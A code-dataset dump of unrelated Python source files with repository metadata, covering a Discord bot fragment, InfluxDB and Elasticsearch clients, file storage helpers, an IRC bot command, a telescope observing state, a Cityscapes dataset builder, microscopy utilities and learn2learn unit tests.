except Exception as e:
print(e)
await message.channel.send("Sorry, the image retrieval failed.", delete_after=10)
# add event listeners for discord commands
addEventListener("an", sendAnimal)
addEventListener("animal", sendAnimal)
addEventListener("ang", sendAnimalGif)
addEventListener("animalgif", sendAnimalGif)
| 42.089552 | 120 | 0.620567 | 305 | 2,820 | 5.721311 | 0.35082 | 0.02063 | 0.032092 | 0.05043 | 0.589112 | 0.589112 | 0.589112 | 0.589112 | 0.570774 | 0.518052 | 0 | 0.011594 | 0.265957 | 2,820 | 66 | 121 | 42.727273 | 0.831401 | 0.053191 | 0 | 0.518519 | 0 | 0 | 0.143661 | 0.009377 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.074074 | 0 | 0.148148 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cae496e1b2f412f1fae88cb2da5c9ceee2ccec9 | 2,020 | py | Python | influxdb-2.0/data_recv.py | anubhavs9/iot-reference-codes | 032802152976b7dea9d9e6cb0e60659efb82c295 | [
"MIT"
] | null | null | null | influxdb-2.0/data_recv.py | anubhavs9/iot-reference-codes | 032802152976b7dea9d9e6cb0e60659efb82c295 | [
"MIT"
] | null | null | null | influxdb-2.0/data_recv.py | anubhavs9/iot-reference-codes | 032802152976b7dea9d9e6cb0e60659efb82c295 | [
"MIT"
] | null | null | null | import json
import influxdb_client
from influxdb_client.client.write_api import SYNCHRONOUS
class QueryData():
CONFIG_FILE = "./config.json"
def __init__(self):
self.readConfigFile()
self.createInfluxClient()
def readConfigFile(self):
try:
with open(self.CONFIG_FILE, 'r') as fp:
config_data = json.load(fp)
self.token = config_data["token"]
self.org = config_data["org"]
self.bucket = config_data["bucket"]
self.url = config_data["url"]
except Exception as file_error:
print(f'Error: {file_error}')
exit(-1)
def createInfluxClient(self):
try:
print("Creating client..")
self.client = influxdb_client.InfluxDBClient(
url=self.url,
token=self.token,
org=self.org
)
self.query_api = self.client.query_api()
except Exception as influx_error:
print(f'Error: {influx_error}')
exit(-1)
def queryData(self, query):
print("Querying data")
result = self.query_api.query(org=self.org, query=query)
results = []
for table in result:
for record in table.records:
results.append((record.get_field(), record.get_value()))
print(results)
def queryStream(self, query):
print("Querying data stream")
records = self.query_api.query_stream(org=self.org, query=query)
for record in records:
print(record.get_field(), record.get_value())
if __name__ == "__main__":
q = QueryData()
query = f'from(bucket:"{q.bucket}")\
|> range(start: -5m)\
|> filter(fn:(r) => r._measurement == "my_measurement")\
|> filter(fn: (r) => r.location == "Prague")\
|> filter(fn:(r) => r._field == "temperature" )'
q.queryData(query=query)
# q.queryStream(query=query)
print("\nDone.") | 33.114754 | 72 | 0.562871 | 225 | 2,020 | 4.88 | 0.306667 | 0.045537 | 0.027322 | 0.027322 | 0.134791 | 0.051002 | 0 | 0 | 0 | 0 | 0 | 0.002147 | 0.308416 | 2,020 | 61 | 73 | 33.114754 | 0.783822 | 0.012871 | 0 | 0.075472 | 0 | 0 | 0.088811 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.056604 | 0 | 0.188679 | 0.150943 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9caf022c3f2864b15bee88ecc375d06b4492e187 | 1,839 | py | Python | filesystem.py | mvdnes/mdms | 95f80efaf9c1b527515d7fd6155f3e9245e86164 | [
"MIT"
] | null | null | null | filesystem.py | mvdnes/mdms | 95f80efaf9c1b527515d7fd6155f3e9245e86164 | [
"MIT"
] | null | null | null | filesystem.py | mvdnes/mdms | 95f80efaf9c1b527515d7fd6155f3e9245e86164 | [
"MIT"
] | 1 | 2018-07-25T10:01:07.000Z | 2018-07-25T10:01:07.000Z | import os
import shutil
def get_instance(configuration):
return Filesystem(configuration)
class Filesystem:
def __init__(self, configuration):
if "filesystem" not in configuration:
raise KeyError("Filesystem not found in configuration")
if "location" not in configuration['filesystem']:
raise KeyError("filesystem.location is not configured")
self.base = configuration['filesystem']['location']
def get_dir(self, uuid):
return self.base + "/" + str(uuid) + "/"
def add(self, uuid, filepath):
directory = self.get_dir(uuid)
if not os.path.exists(directory):
os.makedirs(directory)
shutil.copy2(filepath, directory)
def save(self, uuid, file, filename):
directory = self.get_dir(uuid)
if not os.path.exists(directory):
os.makedirs(directory)
target = os.path.join(directory, filename)
file.save(target)
def get(self, uuid, file=None, basename_only=False):
result = []
directory = self.get_dir(uuid)
for (dirpath, dirnames, filenames) in os.walk(directory):
result = filenames
break # We only want the top level dir
if basename_only:
prefix = ""
else:
prefix = directory
if file is not None:
if file in result:
return prefix + file
return None
return [prefix + r for r in result]
def remove(self, uuid, file):
full = self.get_dir(uuid) + file
try:
os.remove(full)
except OSError:
return False
return True
def remove_dir(self, uuid):
directory = self.get_dir(uuid)
try:
shutil.rmtree(directory)
except OSError:
pass
| 28.734375 | 67 | 0.585644 | 208 | 1,839 | 5.110577 | 0.307692 | 0.033866 | 0.047037 | 0.065851 | 0.171214 | 0.12794 | 0.12794 | 0.12794 | 0.12794 | 0.12794 | 0 | 0.000803 | 0.323002 | 1,839 | 63 | 68 | 29.190476 | 0.853012 | 0.016313 | 0 | 0.230769 | 0 | 0 | 0.067515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0.019231 | 0.038462 | 0.038462 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9caf05395c79fc2af4c7564cdcfd716e7e6bd154 | 2,049 | py | Python | omniscient/kg/triple_store.py | Impavidity/Omniscient | 4e51791739dc9c1b1399df42ff36e0920b4c1c5c | [
"Apache-2.0"
] | 2 | 2018-11-14T05:29:52.000Z | 2019-05-21T03:42:28.000Z | omniscient/kg/triple_store.py | Impavidity/Omniscient | 4e51791739dc9c1b1399df42ff36e0920b4c1c5c | [
"Apache-2.0"
] | null | null | null | omniscient/kg/triple_store.py | Impavidity/Omniscient | 4e51791739dc9c1b1399df42ff36e0920b4c1c5c | [
"Apache-2.0"
] | 2 | 2019-08-08T00:41:26.000Z | 2020-03-17T18:12:31.000Z | from omniscient.base.constants import *
from omniscient.base.logger import Log
from elasticsearch import Elasticsearch, helpers
import json
logger = Log("info")
class ESTripleStore(object):
"""
Triple store backend.
"""
def __init__(self, host, port, settings):
self.es = Elasticsearch(['{}:{}'.format(host, port)])
self.settings = settings
self.index_settings = json.load(open(settings[INDEX_SETTINGS]))
self.actions = []
self.triple_number = 1
def clear_index(self):
logger.info("removing indices {} ...".format(self.settings[INDEX_NAME]))
self.es.indices.delete(index=self.settings[INDEX_NAME], ignore=[400, 404])
def create_index(self):
logger.info("create indices {}".format(self.settings[INDEX_NAME]))
self.es.indices.create(index=self.settings[INDEX_NAME], body=self.index_settings[SETTING])
self.es.indices.put_mapping(index=self.settings[INDEX_NAME], body=self.index_settings[MAPPING], include_type_name=False)
def add_triple(self, subj, pred, obj):
self.actions.append({
"_op_type": "index",
"_index": self.settings[INDEX_NAME],
"_source": {
"subject": {
"text": subj
},
"predicate": {
"text": pred
},
"object": {
"text": obj
}
}
})
size = len(self.actions)
if size >= 100:
logger.info("Execute bulk load - {} triples. Total: {}".format(
self.settings[TRIPLES_TO_BULK], self.triple_number))
helpers.bulk(self.es, self.actions)
self.actions = []
self.triple_number += 1
def close(self):
helpers.bulk(self.es, self.actions)
self.actions = []
logger.info("Execute bulk load - {} triples. Total: {}".format(
self.settings[TRIPLES_TO_BULK], self.triple_number))
def search_node(self, node_uri):
query = {
"query": {
"match": {
"subject.text": node_uri
}
},
"size": 5
}
print(query)
return self.es.search(index=self.settings[INDEX_NAME], body=query)
| 28.068493 | 124 | 0.630063 | 246 | 2,049 | 5.101626 | 0.304878 | 0.095618 | 0.094821 | 0.117131 | 0.451793 | 0.410359 | 0.386454 | 0.345817 | 0.283665 | 0.133865 | 0 | 0.007514 | 0.220595 | 2,049 | 72 | 125 | 28.458333 | 0.778334 | 0.010249 | 0 | 0.155172 | 0 | 0 | 0.107799 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.206897 | 0.017241 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9caf406a1ea001c308fc80f8ba7e257e04a231a5 | 1,223 | py | Python | commands/joinserver.py | Heufneutje/DideRobot | acbb608d5c73cef8739d9dd3149d781afc75acae | [
"MIT"
] | null | null | null | commands/joinserver.py | Heufneutje/DideRobot | acbb608d5c73cef8739d9dd3149d781afc75acae | [
"MIT"
] | null | null | null | commands/joinserver.py | Heufneutje/DideRobot | acbb608d5c73cef8739d9dd3149d781afc75acae | [
"MIT"
] | null | null | null | from CommandTemplate import CommandTemplate
import GlobalStore
from IrcMessage import IrcMessage
class Command(CommandTemplate):
triggers = ['joinserver']
helptext = "Makes me join a server, if it's preconfigured."
adminOnly = True
def execute(self, message):
"""
:type message: IrcMessage
"""
replytext = u""
if message.messagePartsLength == 0:
replytext = u"Please provide a server name to join"
#Assume a non-preconfigured server is entered, in a JSON way, so 'server: irc.server.com'
elif message.messagePartsLength > 1 or ":" in message.message:
replytext = u"Oh, being fancy, are we? This'll be implemented in a bit, but good on you for trying!"
#One word was provided, assume it's a preconfigured server folder
elif message.messagePartsLength == 1:
success = GlobalStore.bothandler.startBotfactory(message.message)
if success:
replytext = u"Successfully created new bot instance for server '{}'".format(message.message)
else:
replytext = u"Something went wrong with trying to create a bot instance for server '{}'. Most likely a typo in the name, or maybe no settings exist yet for that server".format(msgWithoutFirstWord)
message.bot.say(message.source, replytext) | 42.172414 | 200 | 0.745707 | 167 | 1,223 | 5.461078 | 0.57485 | 0.054825 | 0.063596 | 0.065789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002947 | 0.167621 | 1,223 | 29 | 201 | 42.172414 | 0.892927 | 0.145544 | 0 | 0 | 0 | 0.1 | 0.371733 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.15 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb19cdf8855026084363e3183821b88d0d91181 | 1,361 | py | Python | src/panoptes/pocs/state/states/default/observing.py | programatt/POCS | 6450a27e3d3a9bb33e251f5d3508266445fe8136 | [
"MIT"
] | null | null | null | src/panoptes/pocs/state/states/default/observing.py | programatt/POCS | 6450a27e3d3a9bb33e251f5d3508266445fe8136 | [
"MIT"
] | null | null | null | src/panoptes/pocs/state/states/default/observing.py | programatt/POCS | 6450a27e3d3a9bb33e251f5d3508266445fe8136 | [
"MIT"
] | null | null | null | from multiprocessing import Process
from panoptes.utils import error
def on_enter(event_data):
"""Take an observation image.
This state is responsible for taking the actual observation image.
"""
pocs = event_data.model
current_obs = pocs.observatory.current_observation
pocs.say(f"🔭🔭 I'm observing {current_obs.field.field_name}! 🔭🔭")
pocs.next_state = 'parking'
try:
# Do the observing, once per exptime (usually only one unless a compound observation).
for _ in current_obs.exptimes:
pocs.observatory.observe(blocking=True)
pocs.say(f"Finished observing! I'll start processing that in the background.")
# Do processing in background.
process_proc = Process(target=pocs.observatory.process_observation)
process_proc.start()
pocs.logger.debug(f'Processing for {current_obs} started on {process_proc.pid=}')
except (error.Timeout, error.CameraNotFound):
pocs.logger.warning("Timeout waiting for images. Something wrong with cameras, parking.")
except Exception as e:
pocs.logger.warning(f"Problem with imaging: {e!r}")
pocs.say("Hmm, I'm not sure what happened with that exposure.")
else:
pocs.logger.debug('Finished with observing, going to analyze')
pocs.next_state = 'analyzing'
| 40.029412 | 97 | 0.68626 | 176 | 1,361 | 5.238636 | 0.534091 | 0.043384 | 0.017354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.221161 | 1,361 | 33 | 98 | 41.242424 | 0.866038 | 0.155033 | 0 | 0 | 0 | 0 | 0.331278 | 0.027313 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.136364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb3b866b240fca4b686d2dbdbde5c913b7e9e68 | 4,183 | py | Python | src/datasets/cityscape.py | Brazilian-Institute-of-Robotics/autonomous_perception | 5645a2bc6811b33e9e6bf0f6873f496dff45ad94 | [
"MIT"
] | null | null | null | src/datasets/cityscape.py | Brazilian-Institute-of-Robotics/autonomous_perception | 5645a2bc6811b33e9e6bf0f6873f496dff45ad94 | [
"MIT"
] | null | null | null | src/datasets/cityscape.py | Brazilian-Institute-of-Robotics/autonomous_perception | 5645a2bc6811b33e9e6bf0f6873f496dff45ad94 | [
"MIT"
] | 1 | 2020-12-23T23:27:30.000Z | 2020-12-23T23:27:30.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 23 00:54:08 2019
@author: nelson
"""
import tensorflow_datasets.public_api as tfds
import os
import tensorflow as tf
classes = [{'name': 'road' , 'color': [128, 64,128]},
{'name': 'sidewalk' , 'color': [244, 35,232]},
{'name': 'building' , 'color': [ 70, 70, 70]},
{'name': 'wall' , 'color': [102,102,156]},
{'name': 'fence' , 'color': [190,153,153]},
{'name': 'pole' , 'color': [153,153,153]},
{'name': 'traffic light', 'color': [250,170, 30]},
{'name': 'traffic sign' , 'color': [220,220, 0]},
{'name': 'vegetation' , 'color': [107,142, 35]},
{'name': 'terrain' , 'color': [152,251,152]},
{'name': 'sky' , 'color': [ 70,130,180]},
{'name': 'person' , 'color': [220, 20, 60]},
{'name': 'rider' , 'color': [255, 0, 0]},
{'name': 'car' , 'color': [ 0, 0,142]},
{'name': 'truck' , 'color': [ 0, 0, 70]},
{'name': 'bus' , 'color': [ 0, 60,100]},
{'name': 'train' , 'color': [ 0, 80,100]},
{'name': 'motorcycle' , 'color': [ 0, 0,230]},
{'name': 'bicycle' , 'color': [119, 11, 32]},
{'name': 'ignore' , 'color': [ 0, 0, 0]}]
class Cityscape(tfds.core.GeneratorBasedBuilder):
"""Short description of my dataset."""
VERSION = tfds.core.Version("1.0.0")
def _info(self):
return tfds.core.DatasetInfo(
builder=self,
# This is the description that will appear on the datasets page.
description=("This is the dataset for xxx. It contains yyy. The "
"images are kept at their original dimensions."),
# tfds.features.FeatureConnectors
features=tfds.features.FeaturesDict({
"image": tfds.features.Image(shape=(1024, 2048, 3)),
# Here, labels can be of 5 distinct values.
"label": tfds.features.Image(shape=(1024, 2048, 1)),
}),
# If there's a common (input, target) tuple from the features,
# specify them here. They'll be used if as_supervised=True in
# builder.as_dataset.
supervised_keys=("image", "label"),
# Homepage of the dataset for documentation
urls=["https://dataset-homepage.org"],
# Bibtex citation for the dataset
citation=r"""@article{my-awesome-dataset-2020,
author = {Smith, John},"}""",
)
def _split_generators(self, dl_manager):
# Download source data
extracted_path = "/home/nelson/Pictures/datasets/cityscape"
# Specify the splits
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
num_shards=10,
gen_kwargs={
"images_dir_path": os.path.join(extracted_path, "leftImg8bit/train"),
"labels": os.path.join(extracted_path, "gtFine/train"),
},
),
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
num_shards=1,
gen_kwargs={
"images_dir_path": os.path.join(extracted_path, "leftImg8bit/val"),
"labels": os.path.join(extracted_path, "gtFine/val"),
},
),
]
def _generate_examples(self, images_dir_path, labels):
# Read the input data out of the source files
label_suffix = '_gtFine_labelTrainIds.png'
image_suffix = '_leftImg8bit.png'
key=0
for label_path in tf.io.gfile.glob(labels+'/*/*'+label_suffix):
image_path = label_path.replace(label_suffix, image_suffix
).replace(labels, images_dir_path)
yield key, {
"image": image_path,
"label": label_path,
}
key+=1 | 39.838095 | 89 | 0.491274 | 439 | 4,183 | 4.587699 | 0.460137 | 0.006951 | 0.013903 | 0.037736 | 0.154916 | 0.154916 | 0.090367 | 0.055611 | 0.055611 | 0.055611 | 0 | 0.068876 | 0.357877 | 4,183 | 105 | 90 | 39.838095 | 0.680938 | 0.135071 | 0 | 0.084507 | 0 | 0 | 0.205899 | 0.027268 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042254 | false | 0 | 0.042254 | 0.014085 | 0.140845 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb42d7e7d29bdef3eb52b0cd527e745541b8523 | 4,697 | py | Python | scripts/utils.py | JIC-Image-Analysis/leaf-cell-polarisation-tensors | cf5495a77a0bb77aa99206146267e41995ee5ebd | [
"MIT"
] | null | null | null | scripts/utils.py | JIC-Image-Analysis/leaf-cell-polarisation-tensors | cf5495a77a0bb77aa99206146267e41995ee5ebd | [
"MIT"
] | null | null | null | scripts/utils.py | JIC-Image-Analysis/leaf-cell-polarisation-tensors | cf5495a77a0bb77aa99206146267e41995ee5ebd | [
"MIT"
] | null | null | null | """Utility functions."""
import os.path
import logging
import numpy as np
from jicbioimage.core.image import MicroscopyCollection
from jicbioimage.core.transform import transformation
from jicbioimage.core.io import (
AutoWrite,
FileBackend,
DataManager,
_md5_hexdigest_from_file,
)
from jicbioimage.transform import (
remove_small_objects,
max_intensity_projection,
invert,
remove_small_objects,
)
HERE = os.path.dirname(os.path.realpath(__file__))
def get_data_manager():
"""Return a data manager."""
data_dir = os.path.abspath(os.path.join(HERE, "..", "data"))
if not os.path.isdir(data_dir):
raise(OSError("Data directory does not exist: {}".format(data_dir)))
backend_dir = os.path.join(data_dir, 'unpacked')
file_backend = FileBackend(backend_dir)
return DataManager(file_backend), backend_dir
def get_microscopy_collection_from_tiff(input_file):
"""Return microscopy collection from tiff file."""
data_manager, backend_dir = get_data_manager()
data_manager.load(input_file)
md5_hex = _md5_hexdigest_from_file(input_file)
manifest_path = os.path.join(backend_dir, md5_hex, "manifest.json")
microscopy_collection = MicroscopyCollection()
microscopy_collection.parse_manifest(manifest_path)
return microscopy_collection
def get_microscopy_collection_from_org(input_file):
"""Return microscopy collection from microscopy file."""
data_manager, _ = get_data_manager()
return data_manager.load(input_file)
def get_microscopy_collection(input_file):
name, ext = os.path.splitext(input_file)
ext = ext.lower()
if ext == '.tif' or ext == '.tiff':
logging.debug("reading in a tif file")
return get_microscopy_collection_from_tiff(input_file)
else:
logging.debug("reading in a microscopy file")
return get_microscopy_collection_from_org(input_file)
@transformation
def identity(image):
return image
@transformation
def threshold_abs(image, threshold):
"""Return image thresholded using the mean."""
return image > threshold
@transformation
def mask_from_large_objects(image, max_size):
tmp_autowrite = AutoWrite.on
AutoWrite.on = False
mask = remove_small_objects(image, min_size=max_size)
mask = invert(mask)
AutoWrite.on = tmp_autowrite
return mask
def test_remove_large_objects():
ar = np.array([[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 0, 0],
[1, 0, 0, 0]], dtype=bool)
exp = np.array([[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[1, 0, 0, 0]], dtype=bool)
out = remove_large_objects(ar, max_size=3)
print(out)
assert np.array_equal(out, exp)
@transformation
def remove_large_segments(segmentation, max_size):
for i in segmentation.identifiers:
region = segmentation.region_by_identifier(i)
if region.area > max_size:
segmentation[region] = 0
return segmentation
def segment_zslice(image):
"""Segment a zslice."""
tmp_autowrite = AutoWrite.on
AutoWrite.on = False
image = identity(image)
image = threshold_abs(image, 100)
image = remove_small_objects(image, min_size=500)
AutoWrite.on = tmp_autowrite
return image
def preprocess_zstack(zstack_proxy_iterator, cutoff):
"""Select the pixels where the signal is."""
raw = []
zstack = []
for i, proxy_image in enumerate(zstack_proxy_iterator):
image = proxy_image.image
segmented = segment_zslice(image)
raw.append(image)
zstack.append(segmented)
return np.dstack(raw), np.dstack(zstack)
def get_wall_intensity_and_mask_images(microscopy_collection, channel):
"""
Return (wall_intensity2D, wall_intensity3D, wall_mask2D, wall_mask3D).
"""
wall_ziter = microscopy_collection.zstack_proxy_iterator(c=channel)
wall_intensity3D, wall_mask3D = preprocess_zstack(wall_ziter, 90)
wall_intensity2D = max_intensity_projection(wall_intensity3D)
wall_mask2D = max_intensity_projection(wall_mask3D)
return wall_intensity2D, wall_intensity3D, wall_mask2D, wall_mask3D
def get_marker_intensity_images(microscopy_collection, channel):
"""REturn (marker_intensity2D, marker_intensity3D) tuple."""
marker_intensity3D = microscopy_collection.zstack_array(c=channel)
marker_intensity2D = max_intensity_projection(marker_intensity3D)
return marker_intensity2D, marker_intensity3D
def marker_cell_identifier(marker_region, cells):
"""Return cell identifier of marker region."""
pos = marker_region.convex_hull.centroid
return cells[pos]
| 30.303226 | 76 | 0.70875 | 591 | 4,697 | 5.35533 | 0.250423 | 0.012638 | 0.01327 | 0.012638 | 0.265403 | 0.169984 | 0.123223 | 0.048657 | 0.048657 | 0.01327 | 0 | 0.017701 | 0.194166 | 4,697 | 154 | 77 | 30.5 | 0.818494 | 0.085587 | 0 | 0.175926 | 0 | 0 | 0.02787 | 0 | 0 | 0 | 0 | 0 | 0.009259 | 1 | 0.12963 | false | 0 | 0.064815 | 0.009259 | 0.324074 | 0.009259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb4e7e16692d11e46d9cf8f2373fcd636831fcc | 831 | py | Python | cos/patches.py | baylee-d/cos.io | 3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43 | [
"Apache-2.0"
] | null | null | null | cos/patches.py | baylee-d/cos.io | 3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43 | [
"Apache-2.0"
] | null | null | null | cos/patches.py | baylee-d/cos.io | 3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43 | [
"Apache-2.0"
] | null | null | null | from django.utils.html import strip_tags
def highlightingapply():
def highlight(self, text_block):
if not text_block:
return ''
self.text_block = strip_tags(text_block)
highlight_locations = self.find_highlightable_words()
found = False
for k, v in highlight_locations.items():
if len(v) != 0:
found = True
break
start_offset, end_offset = self.find_window(highlight_locations)
if found and len(text_block) > 50:
return self.render_html(highlight_locations, start_offset - 20,
end_offset)
else:
return self.render_html(highlight_locations, 0, 50)
from haystack.utils.highlighting import Highlighter
Highlighter.highlight = highlight
| 30.777778 | 75 | 0.616125 | 93 | 831 | 5.27957 | 0.462366 | 0.09165 | 0.052953 | 0.081466 | 0.154786 | 0.154786 | 0 | 0 | 0 | 0 | 0 | 0.01406 | 0.315283 | 831 | 26 | 76 | 31.961538 | 0.848858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.35 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb6b2fa52f4755d592b0155718670f52aeb9f41 | 5,242 | py | Python | tests/unit/data/metadataset_test.py | Brikwerk/learn2learn | 7997c13c26ec627d13ce77ba98427260df78ada8 | [
"MIT"
] | 1 | 2021-07-07T17:03:45.000Z | 2021-07-07T17:03:45.000Z | tests/unit/data/metadataset_test.py | Brikwerk/learn2learn | 7997c13c26ec627d13ce77ba98427260df78ada8 | [
"MIT"
] | null | null | null | tests/unit/data/metadataset_test.py | Brikwerk/learn2learn | 7997c13c26ec627d13ce77ba98427260df78ada8 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import unittest
from unittest import TestCase
import learn2learn as l2l
import numpy as np
from numpy.testing import assert_array_equal
from learn2learn.data import MetaDataset
from .util_datasets import TestDatasets
class TestMetaDataset(TestCase):
@classmethod
def setUpClass(cls) -> None:
cls.ds = TestDatasets()
cls.meta_tensor_dataset = MetaDataset(cls.ds.tensor_dataset)
cls.meta_str_dataset = MetaDataset(cls.ds.str_dataset)
cls.meta_alpha_dataset = MetaDataset(cls.ds.alphabet_dataset)
cls.mnist_dataset = MetaDataset(cls.ds.get_mnist())
cls.omniglot_dataset = MetaDataset(cls.ds.get_omniglot())
def test_fails_with_non_torch_dataset(self):
try:
MetaDataset(np.random.randn(100, 100))
return False
except TypeError:
return True
finally:
return False
def test_data_length(self):
self.assertEqual(len(self.meta_tensor_dataset), self.ds.n)
self.assertEqual(len(self.meta_str_dataset), self.ds.n)
self.assertEqual(len(self.meta_alpha_dataset), 26)
self.assertEqual(len(self.mnist_dataset), 60000)
self.assertEqual(len(self.omniglot_dataset), 32460)
def test_data_labels_length(self):
self.assertEqual(len(self.meta_tensor_dataset.labels), len(self.ds.tensor_classes))
self.assertEqual(len(self.meta_str_dataset.labels), len(self.ds.str_classes))
self.assertEqual(len(self.meta_alpha_dataset.labels), 26)
self.assertEqual(len(self.mnist_dataset.labels), len(self.ds.mnist_classes))
self.assertEqual(len(self.omniglot_dataset.labels), len(self.ds.omniglot_classes))
def test_data_labels_values(self):
self.assertEqual(sorted(self.meta_tensor_dataset.labels), sorted(self.ds.tensor_classes))
self.assertEqual(sorted(self.meta_str_dataset.labels), sorted(self.ds.str_classes))
self.assertEqual(sorted(self.meta_alpha_dataset.labels), sorted(self.ds.alphabets))
self.assertEqual(sorted(self.omniglot_dataset.labels), sorted(self.ds.omniglot_classes))
def test_get_item(self):
for i in range(5):
rand_index = np.random.randint(0, 26)
data, label = self.meta_alpha_dataset[rand_index]
assert_array_equal(data, [rand_index for _ in range(self.ds.features)])
self.assertEqual(label, chr(97 + rand_index))
def test_labels_to_indices(self):
self.meta_alpha_dataset.create_bookkeeping()
dict_label_to_indices = self.meta_alpha_dataset.labels_to_indices
self.assertEqual(sorted(list(dict_label_to_indices.keys())), self.ds.alphabets)
for key in dict_label_to_indices:
self.assertEqual(dict_label_to_indices[key][0], ord(key) - 97)
def test_union_metadataset(self):
for ds_class in [
l2l.vision.datasets.FC100,
l2l.vision.datasets.CIFARFS,
]:
datasets = [
ds_class('~/data', mode='train', download=True),
ds_class('~/data', mode='validation', download=True),
ds_class('~/data', mode='test', download=True),
]
datasets = [l2l.data.MetaDataset(ds) for ds in datasets]
union = l2l.data.UnionMetaDataset(datasets)
self.assertEqual(len(union), sum([len(ds) for ds in datasets]))
self.assertTrue(len(union.labels) == sum([len(ds.labels) for ds in datasets]))
self.assertTrue(len(union.indices_to_labels) == sum([len(ds.indices_to_labels) for ds in datasets]))
ref = datasets[1][23]
item = union[len(datasets[0]) + 23]
# self.assertTrue(item[1] == ref[1]) # Would fail, because labels are remapped.
self.assertTrue(np.linalg.norm(np.array(item[0]) - np.array(ref[0])) <= 1e-6)
ref = datasets[1][0]
item = union[len(datasets[0]) + 0]
# self.assertTrue(item[1] == ref[1]) # Would fail, because labels are remapped.
self.assertTrue(np.linalg.norm(np.array(item[0]) - np.array(ref[0])) <= 1e-6)
def test_filtered_metadataset(self):
for ds_class in [
l2l.vision.datasets.FC100,
l2l.vision.datasets.CIFARFS,
]:
datasets = [
ds_class('~/data', mode='train', download=True),
ds_class('~/data', mode='validation', download=True),
ds_class('~/data', mode='test', download=True),
]
datasets = [l2l.data.MetaDataset(ds) for ds in datasets]
union = l2l.data.UnionMetaDataset(datasets)
classes = datasets[1].labels
filtered = l2l.data.FilteredMetaDataset(union, classes)
self.assertEqual(len(filtered.labels), len(datasets[1].labels))
self.assertEqual(len(filtered), len(datasets[1]))
for label in filtered.labels:
self.assertTrue(label in datasets[1].labels)
self.assertEqual(
len(filtered.labels_to_indices[label]),
len(datasets[1].labels_to_indices[label])
)
if __name__ == '__main__':
unittest.main()
